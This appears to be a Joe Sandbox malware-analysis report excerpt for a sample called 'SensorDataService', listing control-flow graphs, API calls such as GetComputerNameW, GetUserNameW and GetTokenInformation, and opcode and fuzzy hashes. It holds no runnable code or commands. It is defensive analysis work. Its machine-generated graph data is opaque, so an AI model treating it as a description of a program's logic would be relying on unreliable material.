                                                                                                                                                                      control_flow_graph 0 6e0080-6e0286 2 6e028c 0->2 3 6e0099-6e0575 0->3 4 6e0445 2->4 7 6e057b 3->7 8 6e0155 3->8 4->3 6 6e044b-6e0457 4->6 10 6e0458-6e0472 GetComputerNameW 6->10 7->8 11 6e0581-6e0587 7->11 9 6e02ef-6e0495 call 6ce050 * 2 8->9 9->10 53 6e043e 9->53 15 6e03ee-6e03f4 10->15 16 6e024c-6e0253 10->16 13 6e058b 11->13 18 6e058c-6e0591 13->18 19 6e0181 VirtualFree 13->19 40 6e00da-6e023f 15->40 41 6e03fa 15->41 20 6e01e6 16->20 21 6e0255 16->21 24 6e04ab-6e04af 18->24 25 6e0597 18->25 23 6e01a8-6e02ac call 6f7164 19->23 30 6e01ec-6e0313 call 6f715c 20->30 31 6e02b1-6e02be 20->31 27 6e02d3 21->27 23->31 43 6e04c7 24->43 25->24 26 6e059d 25->26 26->24 27->20 39 6e02d9 27->39 50 6e0318-6e031e 30->50 36 6e03bf-6e03d9 GetUserNameW 31->36 37 6e02c4 31->37 45 6e0331 36->45 37->36 46 6e02ca 37->46 39->9 40->16 54 6e0241-6e024a 40->54 41->40 47 6e0400 41->47 58 6e04cc-6e04e6 call 6f9970 GetComputerNameW 43->58 51 6e0337 45->51 52 6e0171 45->52 46->27 55 6eb1ee-6eb49f 47->55 56 6e0568-6e056b 50->56 57 6e0324 50->57 51->52 61 6e033d 51->61 59 6e013f-6e0146 52->59 60 6e0173 52->60 53->4 54->16 54->31 56->58 57->56 62 6e032a 57->62 69 6e04ec-6e0514 58->69 70 6e0131 58->70 59->13 64 6e0230 60->64 65 6e05d0-6e05d9 61->65 62->45 64->43 68 6e0236-6e05c2 64->68 65->55 68->43 74 6e05c8-6e05c9 68->74 69->56 72 6e0089-6e008c 70->72 73 6e0137 70->73 72->23 77 6e0092 72->77 73->72 75 6e013d 73->75 74->65 75->19 75->59 77->23 78 6e0098 77->78 78->3
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: 964871887158013ab79fee44d01a42069770e3d4cd09d32f7118cc0283a30f3b
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 45D13931419F4D8FE724EF59D8457EAB3E2FBA0310F18461FD446C7264DAB4DA858AC2
                                                                                                                                                                      Function 006C8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 6c8070-6c817e 81 6c813d-6c81a5 79->81 82 6c8180 79->82 88 6c81bd-6c81ca 81->88 89 6c81a7 81->89 82->81 85 6c8161 82->85 87 6c8163-6c8170 call 6f7164 85->87 93 6c8186 CloseHandle 87->93 94 6c8172 87->94 95 6c81d0 88->95 96 6c80f3 88->96 97 6c818c-6c8192 93->97 94->97 110 6c81fe-6c8201 GetTokenInformation 95->110 111 6c80c3 95->111 101 6c808c 96->101 102 6c80f5 96->102 99 6c8194 97->99 100 6c8115-6c8118 97->100 99->100 105 6c819a 99->105 103 6c8119-6c811a 100->103 104 6c80a7 100->104 106 6c808e-6c8184 101->106 102->101 112 6c8077 102->112 103->104 109 6c811c 103->109 105->81 106->93 106->97 115 6c820f 109->115 110->115 125 6c81b7 110->125 111->110 116 6c80c9 111->116 117 6c81d7-6c81de call 6f715c 112->117 115->106 122 6c8215-6c821e 115->122 120 6c80ca-6c80d8 GetTokenInformation 116->120 123 6c81e3-6c81e6 117->123 124 6c810f 120->124 122->106 132 6c8224 122->132 123->120 139 6c8089 123->139 126 6c812d 124->126 127 6c8111 124->127 125->115 130 6c81b9-6c81bb 125->130 134 6c80a8 126->134 135 6c8133-6c81f0 126->135 127->126 131 6c8113 127->131 130->88 131->100 132->117 137 6c8226 132->137 136 6c80aa-6c80ad 134->136 142 6c80da-6c80f1 135->142 143 6c81f6 135->143 136->87 140 6c80b3-6c8203 136->140 137->117 141 6c8228-6c82ee call 6c5d90 137->141 139->120 144 6c808b 139->144 140->87 149 6c8209 140->149 154 6c830c-6c8320 call 6c5d90 call 6cec00 141->154 155 6c82f0 141->155 142->136 143->142 147 6c81fc 143->147 144->101 147->110 159 6c82f7-6c82fc call 6c5d90 154->159 170 6c8322 154->170 155->154 157 6c82f2 155->157 157->159 165 6c8302 159->165 166 6c8253-6c8265 call 6e1280 159->166 165->166 167 6c8308-6c830a 165->167 173 6c8328 166->173 174 6c826b 166->174 167->154 170->159 172 6c8324-6c8326 170->172 172->173 178 6c82df-6c832b 173->178 179 6c8335 173->179 174->173 177 6c823f-6c8243 174->177 177->159 178->179 182 6c832d-6c8331 178->182 183 6c829b-6c829d 179->183 184 6c8287 179->184 182->179 184->183 186 6c824e-6c8252 184->186 186->166
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: 1a34cee51a62ef21c94e848b2a1f727d4d714d0e9aa3c9a0d789ffad9fc56f74
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: C561563061CA869FC7B58B288818FB57BE3FB56350F18021ED44BC37A1CF285D469792
                                                                                                                                                                      Function 006C5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 6c5910-6c5968 189 6c596a 187->189 190 6c5915-6c5928 call 6f9970 187->190 189->190 193 6c5931-6d072c 189->193 196 6c59b8 call 6e0df0 190->196 198 6d0806-6d0809 193->198 199 6d0732-6d0738 193->199 200 6c59bd-6c59c2 call 6c5d90 196->200 207 6d079d-6d07a6 198->207 202 6d073e 199->202 203 6d0800 199->203 212 6c59c7-6c59ce 200->212 202->203 204 6d0744-6d0774 202->204 203->198 206 6d06b3-6d06b7 203->206 213 6d077a-6d081c 204->213 214 6d06d5-6d06d9 204->214 206->207 209 6d06bd 206->209 210 6d07a8 207->210 211 6d0791-6d0793 207->211 209->207 215 6d06c3-6d07fe 209->215 210->211 217 6d07aa 210->217 216 6d07ca-6d07cc 211->216 218 6c5a1a-6c5a26 call 6c5e10 212->218 219 6c59d0 212->219 213->207 222 6d06df 214->222 223 6d06db 214->223 215->203 217->216 218->196 232 6c5a08-6c5a0b 218->232 219->218 225 6c59d2-6c59d8 219->225 222->207 223->222 227 6d06dd 223->227 239 6c59d9-6c59de call 6f2190 225->239 227->222 230 6dc0cc 227->230 233 6dc0ce-6dc0d0 230->233 234 6dc0e8-6dc102 230->234 237 6c5a0d 232->237 238 6c5994-6c599c 232->238 236 6dc0d2-6dc0df 233->236 235 6dc104 234->235 234->236 235->236 247 6dc0e7 235->247 236->247 250 6c5991 237->250 251 6c5932 237->251 244 6c599e-6c59f7 238->244 245 6c5a02 238->245 239->238 255 6c59e0 239->255 244->245 253 6c597d 245->253 254 6c59d4-6c5a15 call 6e11a0 245->254 250->251 256 6c5993 250->256 252 6c59e4-6c59ec call 6f21ac 251->252 264 6c59ed 252->264 265 6c5a62-6c5a6e 252->265 253->254 258 6c597f-6c5981 253->258 255->238 259 6c59e2 255->259 256->238 263 6c5983-6c5a38 258->263 259->252 263->238 270 6c5a3e 263->270 264->263 268 6c59ee-6c59ef 264->268 271 6c5a75-6c5ab3 call 6e1280 265->271 272 6c5a70 265->272 268->263 273 6c59f1 268->273 270->239 280 6c5abb-6c5ac9 271->280 281 6c5ab5 271->281 272->271 274 6c5a72 272->274 273->190 274->271 283 6c5af2-6c5af5 280->283 281->280 282 6c5ab7-6c5ab9 281->282 282->280 287 6c5adb-6c5adc 283->287 288 6c5ad5 283->288 290 6c5a45-6c5a46 287->290 291 6c5ae2 287->291 288->287 289 6c5ad7-6c5ad9 288->289 289->287 291->290 292 6c5ae8 291->292 292->283
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 86c1450bf9c094e939ee8eec5e23809b64b88c736191d204eb99341fd68d81ef
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 01F10431B1DF888FC6A9971E58417BA73D3EB99310F58429EE04BC7396DD34AC468386
                                                                                                                                                                      Function 006C5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 337 6c5b42-6c5b47 call 6c5d90 339 6c5b4c-6c5b52 337->339 341 6c5b0d 339->341 342 6c5c42-6c5c62 call 6e1280 339->342 341->342 343 6c5b13 341->343 359 6c5c14-6c5cc0 342->359 360 6c5c26 342->360 345 6c5c8f-6c5c96 343->345 347 6c5c98-6c5c9a 345->347 348 6c5c29 345->348 349 6c5c9c 347->349 350 6c5c2f-6c5c36 348->350 351 6c5cc2-6c5cc9 call 6c52a0 348->351 357 6c5d0e-6c5d18 349->357 358 6c5bfa 349->358 350->351 355 6c5c3c 350->355 367 6c5c69 351->367 368 6c5ccb 351->368 355->337 363 6c5d1a 357->363 364 6c5d54 357->364 358->357 362 6c5c00 358->362 359->351 360->359 366 6c5c28 360->366 362->359 371 6c5d4b-6c5d52 363->371 366->348 369 6c5c6f 367->369 370 6c5b68-6c5d75 367->370 368->349 372 6c5ccd 368->372 369->370 373 6c5c75 369->373 371->364 374 6c5d45-6c5d47 371->374 372->349 375 6c5ccf-6c5ce4 CreateThread 372->375 373->345 377 6c5d5f 374->377 378 6c5d49 374->378 380 6c5cea 375->380 381 6c5c01-6c5c05 375->381 384 6c5d65 377->384 378->371 378->377 380->381 382 6c5cf0-6c5cf6 380->382 385 6c5c20-6c5c68 381->385 388 6c5d37-6c5d41 381->388 382->385 384->384 388->371 389 6c5d43 388->389 389->364
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 3d2cebb7c0d168c541da3dd5d091b452438fd1b916f7c159ca3e226af60e1c14
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: A621713020CF458FDB6997188C58FB56AE3EB55310F5801AE9047CE3A2DA64FDC5935A
                                                                                                                                                                      Function 006C5B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 390 6c5b09-6c5d01 395 6c5bb4-6c5ce4 CreateThread 390->395 396 6c5d07 390->396 401 6c5cea 395->401 402 6c5c01-6c5c05 395->402 396->395 397 6c5d0d 396->397 400 6c5d37-6c5d41 397->400 403 6c5d4b-6c5d52 400->403 404 6c5d43 400->404 401->402 405 6c5cf0-6c5cf6 401->405 402->400 409 6c5c20-6c5c68 402->409 406 6c5d54 403->406 407 6c5d45-6c5d47 403->407 404->406 405->409 410 6c5d5f 407->410 411 6c5d49 407->411 414 6c5d65 410->414 411->403 411->410 414->414
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 0b0b9479335af27caca946bf01d7751888e59105f6a3e5b1b8ba86de97b7179c
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: E201C07010DF868FDB5557248C68FB97BA3EF50324F6401AFC487CA191DA607DC2A716
                                                                                                                                                                      Function 006C5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 415 6c5b87-6c5b99 CreateThread 416 6c5b1c-6c5b3b 415->416 417 6c5cff-6c5d01 415->417 416->417 418 6c5bb4-6c5ce4 CreateThread 417->418 419 6c5d07 417->419 425 6c5cea 418->425 426 6c5c01-6c5c05 418->426 419->418 420 6c5d0d 419->420 424 6c5d37-6c5d41 420->424 427 6c5d4b-6c5d52 424->427 428 6c5d43 424->428 425->426 429 6c5cf0-6c5cf6 425->429 426->424 433 6c5c20-6c5c68 426->433 430 6c5d54 427->430 431 6c5d45-6c5d47 427->431 428->430 429->433 434 6c5d5f 431->434 435 6c5d49 431->435 438 6c5d65 434->438 435->427 435->434 438->438
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: f714f0bff0071792a068c944bc3adf3a019ac97169718de72cb29d8ad58a7a48
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 94E0863061DB444FDB599B245C607397EE6EB88310F1502CEC44BDB2D1CB696D464792
                                                                                                                                                                      Function 006C599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 439 6c599b-6c599e 440 6c59b8 call 6e0df0 439->440 441 6c59f7 439->441 445 6c59bd-6c59c2 call 6c5d90 440->445 442 6c5a02 441->442 446 6c597d 442->446 447 6c59d4-6c5a15 call 6e11a0 442->447 451 6c59c7-6c59ce 445->451 446->447 450 6c597f-6c5981 446->450 453 6c5983-6c5a38 450->453 454 6c5a1a-6c5a26 call 6c5e10 451->454 455 6c59d0 451->455 462 6c5a3e 453->462 463 6c5994-6c599c 453->463 454->440 468 6c5a08-6c5a0b 454->468 455->454 459 6c59d2-6c59d8 455->459 469 6c59d9-6c59de call 6f2190 459->469 462->469 463->442 466 6c599e 463->466 466->441 468->463 470 6c5a0d 468->470 469->463 476 6c59e0 469->476 474 6c5991 470->474 475 6c5932 470->475 474->475 478 6c5993 474->478 477 6c59e4-6c59ec call 6f21ac 475->477 476->463 479 6c59e2 476->479 482 6c59ed 477->482 483 6c5a62-6c5a6e 477->483 478->463 479->477 482->453 484 6c59ee-6c59ef 482->484 485 6c5a75-6c5ab3 call 6e1280 483->485 486 6c5a70 483->486 484->453 487 6c59f1 call 6f9970 484->487 496 6c5abb-6c5ac9 485->496 497 6c5ab5 485->497 486->485 488 6c5a72 486->488 487->440 488->485 499 6c5af2-6c5af5 496->499 497->496 498 6c5ab7-6c5ab9 497->498 498->496 503 6c5adb-6c5adc 499->503 504 6c5ad5 499->504 506 6c5a45-6c5a46 503->506 507 6c5ae2 503->507 504->503 505 6c5ad7-6c5ad9 504->505 505->503 507->506 508 6c5ae8 507->508 508->499
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: b3a962a8b7e862f9cac5a3f9d7eb11fc595139cb5479a988dc9cc437559771f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D01F26090DFC0CFD75A97594C41BF92553FB54320F2801DE904FCB292C834B9C29746
                                                                                                                                                                      Function 006C8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 509 6c8090-6c8096 510 6c813c-6c81a5 509->510 511 6c8184 509->511 524 6c81bd-6c81ca 510->524 525 6c81a7 510->525 512 6c818c-6c8192 511->512 513 6c8186 CloseHandle 511->513 515 6c8194 512->515 516 6c8115-6c8118 512->516 513->512 515->516 519 6c819a 515->519 517 6c8119-6c811a 516->517 518 6c80a7 516->518 517->518 521 6c811c 517->521 519->510 523 6c820f 521->523 526 6c808e-6c8096 523->526 527 6c8215-6c821e 523->527 530 6c81d0 524->530 531 6c80f3 524->531 526->511 527->526 532 6c8224 527->532 542 6c81fe-6c8201 GetTokenInformation 530->542 543 6c80c3 530->543 534 6c808c 531->534 535 6c80f5 531->535 536 6c8226 532->536 537 6c81d7-6c81e6 call 6f715c 532->537 534->526 535->534 544 6c8077 535->544 536->537 540 6c8228-6c82ee call 6c5d90 536->540 550 6c80ca-6c810f GetTokenInformation 537->550 560 6c8089 537->560 565 6c830c-6c8320 call 6c5d90 call 6cec00 540->565 566 6c82f0 540->566 542->523 556 6c81b7 542->556 543->542 547 6c80c9 543->547 544->537 547->550 557 6c812d 550->557 558 6c8111 550->558 556->523 561 6c81b9-6c81bb 556->561 563 6c80a8 557->563 564 6c8133-6c81f0 557->564 558->557 562 6c8113 558->562 560->550 567 6c808b 560->567 561->524 562->516 568 6c80aa-6c80ad 563->568 575 6c80da-6c80f1 564->575 576 6c81f6 564->576 577 6c82f7-6c82fc call 6c5d90 565->577 596 6c8322 565->596 566->565 571 6c82f2 566->571 567->534 573 6c8163-6c8170 call 6f7164 568->573 574 6c80b3-6c8203 568->574 571->577 573->513 588 6c8172 573->588 574->573 586 6c8209 574->586 575->568 576->575 580 6c81fc 576->580 590 6c8302 577->590 591 6c8253-6c8265 call 6e1280 577->591 580->542 588->512 590->591 592 6c8308-6c830a 590->592 599 6c8328 591->599 600 6c826b 591->600 592->565 596->577 598 6c8324-6c8326 596->598 598->599 604 6c82df-6c832b 599->604 605 6c8335 599->605 600->599 603 6c823f-6c8243 600->603 603->577 604->605 608 6c832d-6c8331 604->608 609 6c829b-6c829d 605->609 610 6c8287 605->610 608->605 610->609 612 6c824e-6c8252 610->612 612->591
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 8aa031aa052b0f8354f5fef07018c515b64e9bb26d369a13bcc651876de42c0c
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AC08C601388039E57380A480C0BFF026C2C212350B0E080F8C06C3B20DD08CE030097
                                                                                                                                                                      Function 006C817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 613 6c817f 614 6c8184 613->614 615 6c818c-6c8192 614->615 616 6c8186 CloseHandle 614->616 617 6c8194 615->617 618 6c8115-6c8118 615->618 616->615 617->618 621 6c819a-6c81a5 617->621 619 6c8119-6c811a 618->619 620 6c80a7 618->620 619->620 622 6c811c 619->622 632 6c81bd-6c81ca 621->632 633 6c81a7 621->633 624 6c820f 622->624 626 6c808e-6c8096 624->626 627 6c8215-6c821e 624->627 626->614 627->626 631 6c8224 627->631 634 6c8226 631->634 635 6c81d7-6c81e6 call 6f715c 631->635 639 6c81d0 632->639 640 6c80f3 632->640 634->635 637 6c8228-6c82ee call 6c5d90 634->637 656 6c8089 635->656 657 6c80ca-6c810f GetTokenInformation 635->657 661 6c830c-6c8320 call 6c5d90 call 6cec00 637->661 662 6c82f0 637->662 652 6c81fe-6c8201 GetTokenInformation 639->652 653 6c80c3 639->653 645 6c808c 640->645 646 6c80f5 640->646 645->626 646->645 654 6c8077 646->654 652->624 674 6c81b7 652->674 653->652 658 6c80c9 653->658 654->635 656->657 663 6c808b 656->663 664 6c812d 657->664 665 6c8111 657->665 658->657 673 6c82f7-6c82fc call 6c5d90 661->673 699 6c8322 661->699 662->661 668 6c82f2 662->668 663->645 671 6c80a8 664->671 672 6c8133-6c81f0 664->672 665->664 669 6c8113 665->669 668->673 669->618 675 6c80aa-6c80ad 671->675 683 6c80da-6c80f1 672->683 684 6c81f6 672->684 690 6c8302 673->690 691 6c8253-6c8265 call 6e1280 673->691 674->624 679 6c81b9-6c81bb 674->679 680 6c8163-6c8170 call 6f7164 675->680 681 6c80b3-6c8203 675->681 679->632 680->616 698 6c8172 680->698 681->680 697 6c8209 681->697 683->675 684->683 688 6c81fc 684->688 688->652 690->691 693 6c8308-6c830a 690->693 703 6c8328 691->703 704 6c826b 691->704 693->661 698->615 699->673 701 6c8324-6c8326 699->701 701->703 708 6c82df-6c832b 703->708 709 6c8335 703->709 704->703 707 6c823f-6c8243 704->707 707->673 708->709 712 6c832d-6c8331 708->712 713 6c829b-6c829d 709->713 714 6c8287 709->714 712->709 714->713 716 6c824e-6c8252 714->716 716->691
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: da1ae90f64f2d25c0e5ac9297a1310dd3bcbd9228667d4bd2c02df44878d6c7c
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BC092A05A850B8F56382A882C0AEF135D6C623760F0E581FED0A8BB60DD5C8D4341A3

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:79
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 5789 685b09 5790 685b16 5789->5790 5791 685cdf CreateThread 5790->5791 5792 685c01 5790->5792 5791->5792 5793 6854a0 5791->5793 5794 6855ef 5797 6855ac 5794->5797 5796 6855e9 5797->5796 5798 6a3870 5797->5798 5799 6a3876 5798->5799 5801 6a3893 5799->5801 5802 6a3720 5799->5802 5801->5797 5804 690c42 5802->5804 5803 6a37dd 5803->5801 5804->5802 5804->5803 5805 68e050 VirtualAlloc 5804->5805 5805->5804 5701 685b00 5702 685bba 5701->5702 5709 6952c0 5702->5709 5704 685bc7 5708 685bde 5704->5708 5714 6a0080 5704->5714 5710 6952c6 5709->5710 5713 6952ce 5709->5713 5710->5713 5728 68e050 5710->5728 5713->5704 5720 6a0089 5714->5720 5715 6a03e0 GetComputerNameW 5715->5720 5716 6a0181 VirtualFree 5716->5720 5717 68e050 VirtualAlloc 5717->5720 5718 6a03bf GetUserNameW 5718->5720 5719 685c7b 5722 688070 5719->5722 5720->5715 5720->5716 5720->5717 5720->5718 5720->5719 5721 6a04d6 GetComputerNameW 5720->5721 5721->5720 5726 688075 5722->5726 5723 688186 CloseHandle 5723->5726 5724 6880ca GetTokenInformation 5724->5726 5725 6881ad GetTokenInformation 5725->5726 5726->5723 5726->5724 5726->5725 5727 6880a7 5726->5727 5727->5708 5729 68e0c3 5728->5729 5730 68e0d8 VirtualAlloc 5729->5730 5730->5729 5750 685860 5751 6952c0 VirtualAlloc 5750->5751 5752 685869 5751->5752 5753 6a0080 5 API calls 5752->5753 5754 68587d 5753->5754 5755 688070 3 API calls 5754->5755 5756 685870 5755->5756 5737 685b42 5738 685b07 5737->5738 5738->5737 5739 685b68 5738->5739 5740 685cdf CreateThread 5738->5740 5740->5739 5741 6854a0 5740->5741 5742 6854b5 5741->5742 5806 6855e4 5808 6855ac 5806->5808 5807 6a3870 VirtualAlloc 5807->5808 5808->5806 5808->5807 5809 6855e9 5808->5809 5743 685b87 CreateThread 5744 685b1c 5743->5744 5747 685810 5743->5747 5745 685cdf CreateThread 5744->5745 5746 685c01 5744->5746 5745->5746 5749 6854a0 5745->5749 5748 685822 5747->5748 5757 688090 5761 688075 5757->5761 5758 688186 CloseHandle 5758->5761 5759 6880ca GetTokenInformation 5759->5761 5760 6881ad GetTokenInformation 5760->5761 5761->5758 5761->5759 5761->5760 5762 6880a7 5761->5762 5810 6857f0 5811 6855ac 5810->5811 5812 6855e9 5811->5812 5813 6a3870 VirtualAlloc 5811->5813 5813->5811 5731 6881b1 5735 688075 5731->5735 5732 688186 CloseHandle 5732->5735 5733 6880ca GetTokenInformation 5733->5735 5734 6881ad GetTokenInformation 5734->5735 5735->5732 5735->5733 5735->5734 5736 6880a7 5735->5736

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 006852A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
